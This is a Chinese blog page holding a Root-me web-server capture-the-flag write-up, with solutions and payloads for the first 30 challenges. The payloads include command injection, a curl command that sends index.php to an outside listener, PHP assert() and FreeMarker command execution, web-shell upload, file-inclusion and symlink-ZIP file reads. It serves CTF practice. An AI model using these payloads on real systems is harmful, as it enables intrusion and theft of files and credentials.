<!DOCTYPE html>
<html lang=zh-CN>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta property="og:description" content="">
    <meta property="og:type" content="website">
    <meta name="description" content="">
    <meta name="keyword"  content="">
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
        Root-me Web-server write up - LH&#39;s blog
        
    </title>

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/aircloud.css">

    
<link rel="stylesheet" href="/css/gitment.css">

    <!--<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">-->
    <link href="//at.alicdn.com/t/font_620856_28hi1hpxx24.css" rel="stylesheet" type="text/css">
    <!-- ga & ba script hoook -->
    <script></script>

    









<meta name="generator" content="Hexo 6.3.0"></head>

<body>

<div class="site-nav-toggle" id="site-nav-toggle">
    <button>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
    </button>
</div>

<div class="index-about">
    <i> 常记常新 </i>
</div>

<div class="index-container">
    
    <div class="index-left">
        
<div class="nav" id="nav">
    <div class="avatar-name">
        <div class="avatar radius">
            <img src="/img/avatar.jpg" />
        </div>
        <div class="name">
            <i>LH</i>
        </div>
    </div>
    <div class="contents" id="nav-content">
        <ul>
            <li >
                <a href="/">
                    <i class="iconfont icon-shouye1"></i>
                    <span>主页</span>
                </a>
            </li>
            <li >
                <a href="/tags">
                    <i class="iconfont icon-biaoqian1"></i>
                    <span>标签</span>
                </a>
            </li>
            <li >
                <a href="/archives">
                    <i class="iconfont icon-guidang2"></i>
                    <span>存档</span>
                </a>
            </li>
            <li >
                <a href="/about/">
                    <i class="iconfont icon-guanyu2"></i>
                    <span>关于</span>
                </a>
            </li>
            
            <li>
                <a id="search">
                    <i class="iconfont icon-sousuo1"></i>
                    <span>搜索</span>
                </a>
            </li>
            
        </ul>
    </div>
    
        <div id="toc" class="toc-article">
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-HTML"><span class="toc-text">1.HTML</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-HTTP-Open-redirect"><span class="toc-text">2.HTTP - Open redirect</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-Command-injection"><span class="toc-text">3.Command injection</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-Weak-password"><span class="toc-text">4.Weak password</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-User-agent"><span class="toc-text">5.User-agent</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-Backup-file"><span class="toc-text">6.Backup file</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-HTTP-POST"><span class="toc-text">7.HTTP - POST</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8-HTTP-directory-indexing"><span class="toc-text">8.HTTP directory indexing</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9-HTTP-Headers"><span class="toc-text">9.HTTP Headers</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10-HTTP-verb-tampering"><span class="toc-text">10.HTTP verb tampering</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#11-Install-files"><span class="toc-text">11.Install files</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#12-Improper-redirect"><span class="toc-text">12.Improper redirect</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#13-CRLF"><span class="toc-text">13.CRLF</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#14-File-upload-double-extensions"><span class="toc-text">14.File upload - double extensions</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#15-File-upload-MIME-type"><span class="toc-text">15.File upload - MIME type</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#16-HTTP-cookies"><span class="toc-text">16.HTTP cookies</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#17-Directory-traversal"><span class="toc-text">17.Directory traversal</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#18-File-upload-null-byte"><span class="toc-text">18.File upload - null byte</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#19-PHP-assert"><span class="toc-text">19.PHP assert()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#20-PHP-filters"><span class="toc-text">20.PHP filters</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#21-PHP-register-globals"><span class="toc-text">21.PHP register globals</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#22-File-upload-ZIP"><span class="toc-text">22.File upload - ZIP</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#23-Command-injection-Filter-bypass"><span class="toc-text">23.Command injection - Filter bypass</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#24-Local-File-Inclusion"><span class="toc-text">24.Local File Inclusion</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#25-Local-File-Inclusion-Double-encoding"><span class="toc-text">25.Local File Inclusion - Double encoding</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#26-PHP-Loose-Comparison"><span class="toc-text">26.PHP - Loose Comparison</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#27-PHP-preg-replace"><span class="toc-text">27.PHP preg_replace()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#28-PHP-type-juggling"><span class="toc-text">28.PHP type juggling</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#29-Remote-File-Inclusion"><span class="toc-text">29.Remote File Inclusion</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#30-Server-side-Template-Injection"><span class="toc-text">30.Server-side Template Injection</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#31-SQL-injection-authentication"><span class="toc-text">31.SQL injection - authentication</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#32-SQL-injection-authentication-GBK"><span class="toc-text">32.SQL injection - authentication - GBK</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#33-SQL-injection-string"><span class="toc-text">33.SQL injection - string</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#34-LDAP-injection-authentication"><span class="toc-text">34.LDAP injection - authentication</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#35-NoSQL-injection-authentication"><span class="toc-text">35.NoSQL injection - authentication</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#36-Path-Truncation"><span class="toc-text">36.Path Truncation</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#37-PHP-Serialization"><span class="toc-text">37.PHP Serialization</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#38-SQL-injection-numeric"><span class="toc-text">38.SQL injection - numeric</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#39-SQL-Injection-Routed"><span class="toc-text">39.SQL Injection - Routed</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#40-PHP-Eval"><span class="toc-text">40.PHP - Eval</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#41-XML-External-Entity"><span class="toc-text">41.XML External Entity</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#42-SQL-Truncation"><span class="toc-text">42.SQL Truncation</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#43-XPath-injection-authentication"><span class="toc-text">43.XPath injection - authentication</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#44-Local-File-Inclusion-Wrappers"><span class="toc-text">44.Local File Inclusion - Wrappers</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#45-SQL-injection-Error"><span class="toc-text">45.SQL injection - Error</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#46-SQL-injection-Insert"><span class="toc-text">46.SQL injection - Insert</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#47-XSLT-Code-execution"><span class="toc-text">47.XSLT - Code execution</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#48-Java-Spring-Boot"><span class="toc-text">48.Java - Spring Boot</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#49-SQL-injection-file-reading"><span class="toc-text">49.SQL injection - file reading</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#50-XPath-injection-string"><span class="toc-text">50.XPath injection - string</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#51-NoSQL-injection-blind"><span class="toc-text">51.NoSQL injection - blind</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#52-SQL-injection-Time-based"><span class="toc-text">52.SQL injection - Time based</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#53-SQL-injection-blind"><span class="toc-text">53.SQL injection - blind</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#54-XPath-injection-blind"><span class="toc-text">54.XPath injection - blind</span></a></li></ol>
</div>
    
</div>


<div class="search-field" id="search-field">
    <div class="search-bg" id="search-bg"></div>
    <div class="search-container">
        <div class="search-input">
            <span id="esc-search"> <i class="icon-fanhui iconfont"></i></span>
            <input id="search-input"/>
            <span id="begin-search">搜索</span>
        </div>
        <div class="search-result-container" id="search-result-container">

        </div>
    </div>
</div>

        <div class="index-about-mobile">
            <i> 常记常新 </i>
        </div>
    </div>
    
    <div class="index-middle">
        <!-- Main Content -->
        


<div class="post-container">
    <div class="post-title">
        Root-me Web-server write up
    </div>

    <div class="post-meta">
        <span class="attr">发布于：<span>2018-11-22 10:13:19</span></span>
        
        <span class="attr">标签：/
        
        <a class="tag" href="/tags/#web安全" title="web安全">web安全</a>
        <span>/</span>
        
        <a class="tag" href="/tags/#CTF" title="CTF">CTF</a>
        <span>/</span>
        
        
        </span>
        <span class="attr">访问：<span id="busuanzi_value_page_pv"></span>
</span>
</span>
    </div>
    <div class="post-content no-indent">
        <p>root-me是一个在线的ctf题库(需翻墙)，包含了各个维度的题型，题不算难，但是比较全面。做了一下web-server的题，并做了记录。</p>
<h2 id="1-HTML"><a href="#1-HTML" class="headerlink" title="1.HTML"></a>1.HTML</h2><p>[+]URL: <a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch1/" title="http://challenge01.root-me.org/web-serveur/ch1/">http://challenge01.root-me.org/web-serveur/ch1/</a><br>[+]Statement:找到flag<br>[+]Solution:flag在源码里,F12即可</p>
<h2 id="2-HTTP-Open-redirect"><a href="#2-HTTP-Open-redirect" class="headerlink" title="2.HTTP - Open redirect"></a>2.HTTP - Open redirect</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch52/" title="http://challenge01.root-me.org/web-serveur/ch52/">http://challenge01.root-me.org/web-serveur/ch52/</a><br>[+]Statement:找到一种方法把网页定向到其他网站<br>[+]Solution:修改url里get的网站名，并计算其md5值<br>[+]Payload:&#x2F;web-serveur&#x2F;ch52&#x2F;?url&#x3D;<a target="_blank" rel="noopener" href="https://www.baidu.com&h=f9751de431104b125f48dd79cc55822a/" title="https://www.baidu.com&amp;h=f9751de431104b125f48dd79cc55822a">https://www.baidu.com&amp;h&#x3D;f9751de431104b125f48dd79cc55822a</a></p>
<h2 id="3-Command-injection"><a href="#3-Command-injection" class="headerlink" title="3.Command injection"></a>3.Command injection</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch54/" title="http://challenge01.root-me.org/web-serveur/ch54/">http://challenge01.root-me.org/web-serveur/ch54/</a><br>[+]Statement:找到漏洞并利用，flag在index.php里<br>[+]Solution:典型的命令注入漏洞，利用;分割命令，使用cat打印源码，再用F12查看<br>[+]Payload:127.0.0.1;cat index.php</p>
<h2 id="4-Weak-password"><a href="#4-Weak-password" class="headerlink" title="4.Weak password"></a>4.Weak password</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch3/" title="http://challenge01.root-me.org/web-serveur/ch3/">http://challenge01.root-me.org/web-serveur/ch3/</a><br>[+]Solution:标题提示弱密码，账户admin，密码admin，登录成功</p>
<h2 id="5-User-agent"><a href="#5-User-agent" class="headerlink" title="5.User-agent"></a>5.User-agent</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch2/" title="http://challenge01.root-me.org/web-serveur/ch2/">http://challenge01.root-me.org/web-serveur/ch2/</a><br>[+]Solution:修改User-agent为admin</p>
<h2 id="6-Backup-file"><a href="#6-Backup-file" class="headerlink" title="6.Backup file"></a>6.Backup file</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch11/" title="http://challenge01.root-me.org/web-serveur/ch11/">http://challenge01.root-me.org/web-serveur/ch11/</a><br>[+]Solution:输入index.php~即可下载源码</p>
<h2 id="7-HTTP-POST"><a href="#7-HTTP-POST" class="headerlink" title="7.HTTP - POST"></a>7.HTTP - POST</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch56/" title="http://challenge01.root-me.org/web-serveur/ch56/">http://challenge01.root-me.org/web-serveur/ch56/</a><br>[+]Statement:想办法打败最高分<br>[+]Solution:用bp修改数据包，把score参数的值修改到大于999999即可</p>
<h2 id="8-HTTP-directory-indexing"><a href="#8-HTTP-directory-indexing" class="headerlink" title="8.HTTP directory indexing"></a>8.HTTP directory indexing</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch4/" title="http://challenge01.root-me.org/web-serveur/ch4/">http://challenge01.root-me.org/web-serveur/ch4/</a><br>[+]Solution:在源码里发现存在文件admin&#x2F;pass.html,输入payload：admin可以列出目录，在backup的admin.txt到到flag</p>
<h2 id="9-HTTP-Headers"><a href="#9-HTTP-Headers" class="headerlink" title="9.HTTP Headers"></a>9.HTTP Headers</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch5/" title="http://challenge01.root-me.org/web-serveur/ch5/">http://challenge01.root-me.org/web-serveur/ch5/</a><br>[+]Statement:获得 administrator用户权限<br>[+]Solution:在服务器的返回头里发现Header-RootMe-Admin: none，于是在请求里加上Header-RootMe-Admin:administrator,得到flag</p>
<h2 id="10-HTTP-verb-tampering"><a href="#10-HTTP-verb-tampering" class="headerlink" title="10.HTTP verb tampering"></a>10.HTTP verb tampering</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch8/" title="http://challenge01.root-me.org/web-serveur/ch8/">http://challenge01.root-me.org/web-serveur/ch8/</a><br>[+]Solution:篡改HTTP请求，换成OPTIONS即可绕过</p>
<h2 id="11-Install-files"><a href="#11-Install-files" class="headerlink" title="11.Install files"></a>11.Install files</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch6/" title="http://challenge01.root-me.org/web-serveur/ch6/">http://challenge01.root-me.org/web-serveur/ch6/</a><br>[+]Solution:题目提示PHPBB和installfiles，查看PHPBB源码得知PHPBB的安装路径为&#x2F;install&#x2F;install.php。输入此路径得到flag。此漏洞提示我们安装完CMS后记得删除安装文件</p>
<h2 id="12-Improper-redirect"><a href="#12-Improper-redirect" class="headerlink" title="12.Improper redirect"></a>12.Improper redirect</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch32/" title="http://challenge01.root-me.org/web-serveur/ch32/">http://challenge01.root-me.org/web-serveur/ch32/</a><br>[+]Solution:使用BP抓包可以看到get上面的URL时返回的数据包里有flag。此漏洞提醒在使用PHP里的header(‘Location:…’)函数后需要使用exit()，不然php会继续执行后面的代码，可能会造成信息泄漏</p>
<h2 id="13-CRLF"><a href="#13-CRLF" class="headerlink" title="13.CRLF"></a>13.CRLF</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch14/" title="http://challenge01.root-me.org/web-serveur/ch14/">http://challenge01.root-me.org/web-serveur/ch14/</a><br>[+]Statement:注入错误的数据到日志中<br>[+]Solution:页面显示的日志中存在认证失败和认证成功两种信息。通过使用CRLF注入，在username参数的位置注入一个%0d%0a，伪造出一个认证成功的信息<br>[+]Payload:username&#x3D;admin authenticated.%0D%0Aadmin&amp;password&#x3D;123</p>
<h2 id="14-File-upload-double-extensions"><a href="#14-File-upload-double-extensions" class="headerlink" title="14.File upload - double extensions"></a>14.File upload - double extensions</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch20/" title="http://challenge01.root-me.org/web-serveur/ch20/">http://challenge01.root-me.org/web-serveur/ch20/</a><br>[+]Statement:目标是上传php代码，查看应用根目录的.passwd文件<br>[+]Solution:在 &#x2F;?galerie&#x3D;upload处可以上传文件，直接上传php文件会被拦截。使用bp上传一句话木马，并把文件名改为1.php.jpg,测试发现web服务器可以解析该文件，通过执行系统命令可以看到.passwd的内容</p>
<h2 id="15-File-upload-MIME-type"><a href="#15-File-upload-MIME-type" class="headerlink" title="15.File upload - MIME type"></a>15.File upload - MIME type</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch21/" title="http://challenge01.root-me.org/web-serveur/ch21/">http://challenge01.root-me.org/web-serveur/ch21/</a><br>[+]Statement:同上<br>[+]Solution:同上面一样上传文件，并在BP中把数据包的MIME类型修改为image&#x2F;png,上传成功。</p>
<h2 id="16-HTTP-cookies"><a href="#16-HTTP-cookies" class="headerlink" title="16.HTTP cookies"></a>16.HTTP cookies</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch7/" title="http://challenge01.root-me.org/web-serveur/ch7/">http://challenge01.root-me.org/web-serveur/ch7/</a><br>[+]Solution:在网页的源码中看见了提示SetCookie(‘ch7,’visiteur’’),结合页面的提示，在请求头中加上Cookie:ch7&#x3D;admin，获得flag</p>
<h2 id="17-Directory-traversal"><a href="#17-Directory-traversal" class="headerlink" title="17.Directory traversal"></a>17.Directory traversal</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch15/ch15.php" title="http://challenge01.root-me.org/web-serveur/ch15/ch15.php">http://challenge01.root-me.org/web-serveur/ch15/ch15.php</a><br>[+]Solution:目录穿越漏洞，输入payload：?galerie&#x3D;&#x2F;，可列出galerie目录下的文件列表，接着输入payload：?galerie&#x3D;&#x2F;86hwnX2r&#x2F;，可以看到password.txt。访问这个文件，得到flag</p>
<h2 id="18-File-upload-null-byte"><a href="#18-File-upload-null-byte" class="headerlink" title="18.File upload - null byte"></a>18.File upload - null byte</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch22/" title="http://challenge01.root-me.org/web-serveur/ch22/">http://challenge01.root-me.org/web-serveur/ch22/</a><br>[+]Solution:同样是文件上传漏洞，这里是00截断,需要把filename改成1.php%00.jpg，同时需要修改MIMIE类型。</p>
<h2 id="19-PHP-assert"><a href="#19-PHP-assert" class="headerlink" title="19.PHP assert()"></a>19.PHP assert()</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch47/" title="http://challenge01.root-me.org/web-serveur/ch47/">http://challenge01.root-me.org/web-serveur/ch47/</a><br>[+]Statement:Find and exploit the vulnerability to read the file .passwd.<br>[+]Solution:提供错误的page参数，根据回显的assert函数的结果，可以进行拼接执行命令。<br>[+]payload:?page&#x3D;%27,%27..%27)%20&#x3D;&#x3D;&#x3D;%20false%20and%20system(%27cat%20.passwd%27)%20and%20strpos(%27</p>
<h2 id="20-PHP-filters"><a href="#20-PHP-filters" class="headerlink" title="20.PHP filters"></a>20.PHP filters</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch12/" title="http://challenge01.root-me.org/web-serveur/ch12/">http://challenge01.root-me.org/web-serveur/ch12/</a><br>[+]Statement:找到administrator用户的密码<br>[+]Solution：通过报错发现使用了include函数，此处有文件包含漏洞，使用file:&#x2F;&#x2F;etc&#x2F;passwd,发现不能包含远程文件。使用php协议进行本地文件包含<br>[+]Payload:</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php" title="http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php">http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php</a></li>
<li><a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=config.php" title="http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=config.php">http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=config.php</a></li>
</ul>
<h2 id="21-PHP-register-globals"><a href="#21-PHP-register-globals" class="headerlink" title="21.PHP register globals"></a>21.PHP register globals</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch17/" title="http://challenge01.root-me.org/web-serveur/ch17/">http://challenge01.root-me.org/web-serveur/ch17/</a> &amp;#x20;<br>[+]Statement:似乎开发者经常把备份文件留下… &amp;#x20;<br>[+]Solution:根据提示，下载到文件index.php.bak,分析源码。根据测试判断该服务器开启了register_globals，因此存在变量覆盖漏洞。根据源码的逻辑，有两种解题思路，一种是直接覆盖session[logged],另一种方法，覆盖password和hidden_password，接着使用这个Cookie，就可以获得flag &amp;#x20;<br>[+]Payload:</p>
<ul>
<li>_SESSION[logged]&#x3D;1</li>
<li>password&#x3D;1&amp;hidden_password&#x3D;1</li>
</ul>
<h2 id="22-File-upload-ZIP"><a href="#22-File-upload-ZIP" class="headerlink" title="22.File upload - ZIP"></a>22.File upload - ZIP</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch51/" title="http://challenge01.root-me.org/web-serveur/ch51/">http://challenge01.root-me.org/web-serveur/ch51/</a> &amp;#x20;<br>[+]Statement:读index.php文件1qqq &amp;#x20;<br>[+]Solution:目标是要读到index.php的内容。网站的文件上传功能只能上传.zip文件，上传完成后，服务器会解压缩，解压缩后的文件可以访问。但问题是上传的文件只有txt&#x2F;jpg可以访问。因此构造命令如下，创建一个符号链接。</p>
<blockquote>
<p>ln -s ..&#x2F;..&#x2F;..&#x2F;index.php index.txt </p>
</blockquote>
<p>接着使用如下命令压缩这个符号链接。 &amp;#x20;</p>
<blockquote>
<p>zip –symlinks index.zip index.txt</p>
</blockquote>
<p>上传这个zip文件，再访问index.txt,即可读到服务器上的index.php</p>
<h2 id="23-Command-injection-Filter-bypass"><a href="#23-Command-injection-Filter-bypass" class="headerlink" title="23.Command injection - Filter bypass"></a>23.Command injection - Filter bypass</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch53/index.php" title="http://challenge01.root-me.org/web-serveur/ch53/">http://challenge01.root-me.org/web-serveur/ch53/</a><br>[+]Statement:找到漏洞并利用，她有一些保护。flag在index.php里<br>[+]Solution:同样的命令注入，发现过滤掉了一些符号，同时命令的运行结果不会返回，经过测试发现 - 没有被过滤，但 | &lt; &gt; ; \ ` &amp; 等符号被过滤掉了，但是仍然可以用%0a注入新的命令，另外反弹shell不太能实现，选择使用curl上传文件的方法读文件。先在vps上监听 &amp;#x20;</p>
<blockquote>
<p>nc -lvv 9999</p>
</blockquote>
<p>接着执行payload如下，可以读到index.php &amp;#x20;<br>[+]Payload:127.0.0.1%0acurl -F ‘filename&#x3D;@index.php’ HOST_ADDRESS:9999</p>
<h2 id="24-Local-File-Inclusion"><a href="#24-Local-File-Inclusion" class="headerlink" title="24.Local File Inclusion"></a>24.Local File Inclusion</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch16/" title="http://challenge01.root-me.org/web-serveur/ch16/">http://challenge01.root-me.org/web-serveur/ch16/</a><br>[+]Statement:获得Admin的部分<br>[+]Solution:该服务器是一个明显的本地文件包含，结合提示构造url读取admin下的index.php<br>[+]Payload:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch16/?files=crypto&f=../../admin/index.php" title="http://challenge01.root-me.org/web-serveur/ch16/?files=crypto&amp;f=../../admin/index.php">http://challenge01.root-me.org/web-serveur/ch16/?files=crypto&amp;f&#x3D;..&#x2F;..&#x2F;admin&#x2F;index.php</a></p>
<h2 id="25-Local-File-Inclusion-Double-encoding"><a href="#25-Local-File-Inclusion-Double-encoding" class="headerlink" title="25.Local File Inclusion - Double encoding"></a>25.Local File Inclusion - Double encoding</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch45/" title="http://challenge01.root-me.org/web-serveur/ch45/">http://challenge01.root-me.org/web-serveur/ch45/</a><br>[+]Statement:在网站的源码里找到认证密码<br>[+]Solution:在URL里发现是一个文件包含。直接使用php:&#x2F;&#x2F;filter&#x2F;…会发现被拦截了。根据提示，进行url编码，编码一次还是会被拦截，当编码两次时成功绕过。此处需要注意的是，使用在线的或者是python等urlencode的api时，它不会编码 . ,需要手动把.编码成%2e,才能绕过。通过查看源码，可以找到存在密码的config.inc.php<br>[+]Payload:</p>
<ul>
<li>php%253A%252F%252Ffilter%252Fconvert%252Ebase64%252Dencode%252Fresource%253Dcv</li>
<li>php%253A%252F%252Ffilter%252Fconvert%252Ebase64%252Dencode%252Fresource%253Dconf</li>
</ul>
<h2 id="26-PHP-Loose-Comparison"><a href="#26-PHP-Loose-Comparison" class="headerlink" title="26.PHP - Loose Comparison"></a>26.PHP - Loose Comparison</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch55/" title="http://challenge01.root-me.org/web-serveur/ch55/">http://challenge01.root-me.org/web-serveur/ch55/</a> &amp;#x20;<br>[+]Solution:页面可以查看源码。代码的逻辑是传入两个字母和数字组成的字符串，第一个字符串和一个随机数拼接，要求和第二个参数的md5值相等。题目使用&#x3D;&#x3D;来判断。&#x3D;&#x3D;在两者的类型不同时先转换类型为相同再比较，如果有数字类型的就会按数字类型转换。根据题目构造payload，即可获得flag &amp;#x20;<br>[+]Payload:s&#x3D;0e242&amp;h&#x3D;240610708&amp;submit&#x3D;Check</p>
<h2 id="27-PHP-preg-replace"><a href="#27-PHP-preg-replace" class="headerlink" title="27.PHP preg_replace()"></a>27.PHP preg_replace()</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch37/index.php" title="http://challenge01.root-me.org/web-serveur/ch37/index.php">http://challenge01.root-me.org/web-serveur/ch37/index.php</a> &amp;#x20;<br>[+]Statement:读flag.php &amp;#x20;<br>[+]Solution:经过测试发现页面的三个输入点分别对应preg_replace的三个参数，利用preg_replace在第一个参数有&#x2F;e的标示下，当满足匹配时会把第二个参数当作代码执行，因此构造payload可以读文件 &amp;#x20;<br>[+]Payload:search&#x3D;&#x2F;a&#x2F;e&amp;replace&#x3D;file_get_contents(‘flag.php’)&amp;content&#x3D;a</p>
<h2 id="28-PHP-type-juggling"><a href="#28-PHP-type-juggling" class="headerlink" title="28.PHP type juggling"></a>28.PHP type juggling</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch44/" title="http://challenge01.root-me.org/web-serveur/ch44/">http://challenge01.root-me.org/web-serveur/ch44/</a> &amp;#x20;<br>[+]Solution:可以看到源码，页面的逻辑是需要满足$auth[‘data’][‘login’] &#x3D;&#x3D; $USER &amp;&amp; !strcmp($auth[‘data’][‘password’]。同样是两个弱类型比较，第一个只需要满足值为0或者为true，即可绕过，strcmp需要使传入的参数为不含有字母的数组，即可绕过。 &amp;#x20;</p>
<p>[+]Payload:auth&#x3D;%7B%22data%22%3A%7B%22login%22%3A0%2C%22password%22%3A[122]%7D%7D</p>
<h2 id="29-Remote-File-Inclusion"><a href="#29-Remote-File-Inclusion" class="headerlink" title="29.Remote File Inclusion"></a>29.Remote File Inclusion</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch13/" title="http://challenge01.root-me.org/web-serveur/ch13/">http://challenge01.root-me.org/web-serveur/ch13/</a> &amp;#x20;<br>[+]Statement:获取PHP源代码 &amp;#x20;<br>[+]Solution:测试发现有文件包含，且开启了allow_url_fopen和allow_url_include，即可以实现远程文件包含。由于在代码执行时，用户的参数被加上了后缀，使用php:&#x2F;&#x2F;input或者是file:&#x2F;&#x2F;….不太好用，因此选择使用data:text&#x2F;plain,&lt;?php … ?&gt;进行文件包含，可以读到源码 &amp;#x20;<br>[+]Payload:?lang&#x3D;data:text&#x2F;plain,&lt;?php echo file_get_contents(‘index.php’); ?&gt;</p>
<h2 id="30-Server-side-Template-Injection"><a href="#30-Server-side-Template-Injection" class="headerlink" title="30.Server-side Template Injection"></a>30.Server-side Template Injection</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch41/" title="http://challenge01.root-me.org/web-serveur/ch41/">http://challenge01.root-me.org/web-serveur/ch41/</a> &amp;#x20;<br>[+]Statement:JAVA EE。利用漏洞获得SECRET_FLAG.txt中的密码。 &amp;#x20;<br>[+]Solution:根据提示，得知服务器使用的中间件为JAVAEE，查询资料得知FreeMarker为java下最受欢迎的模版引擎，利用其格式在输入点输入${3*3}，发现被渲染成了9。利用FreeMarker的一个可以用来执行命令的类构造出如下payload，即可查看flag内容。 &amp;#x20;<br>[+]Payload:nickname&#x3D;&lt;#assign ex&#x3D;”freemarker.template.utility.Execute”?new()&gt; ${ ex(“cat SECRET_FLAG.txt”) }</p>
